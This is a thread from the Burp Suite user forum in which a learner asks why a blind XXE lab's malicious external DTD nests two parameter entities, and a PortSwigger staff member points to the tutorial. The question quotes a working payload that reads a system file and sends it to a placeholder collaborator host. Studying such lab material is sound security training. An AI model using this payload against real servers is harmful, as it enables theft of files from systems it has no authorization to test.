Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Nested parameter Entities (XXE labs)

Nerio.Stracci | Last updated: Mar 08, 2022 07:52PM UTC

Hi, I have a question about the parameters entites used in the Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD : (1) <!ENTITY % file SYSTEM "file:///etc/hostname"> (2) <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/?x=%file;'>"> (3) %eval; (4) %exfil; I don't understand the line (2) : why should we use 2 parameter entities ? Why not directly perform <!ENTITY % exfil SYSTEM 'http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/?x=%file;'> ?

Hannah, PortSwigger Agent | Last updated: Mar 09, 2022 09:12AM UTC

Hi

This is explained in the learning material here.

This DTD carries out the following steps:
  • Defines an XML parameter entity called file, containing the contents of the /etc/passwd file.
  • Defines an XML parameter entity called eval, containing a dynamic declaration of another XML parameter entity called exfiltrate. The exfiltrate entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the file entity within the URL query string.

Muhammad | Last updated: Sep 16, 2022 06:10AM UTC

Hannah where it is mentioned

Hannah, PortSwigger Agent | Last updated: Sep 16, 2022 08:37AM UTC

The linked learning material can be found here: https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-exfiltrate-data-out-of-band

Rahul | Last updated: Aug 27, 2023 08:12AM UTC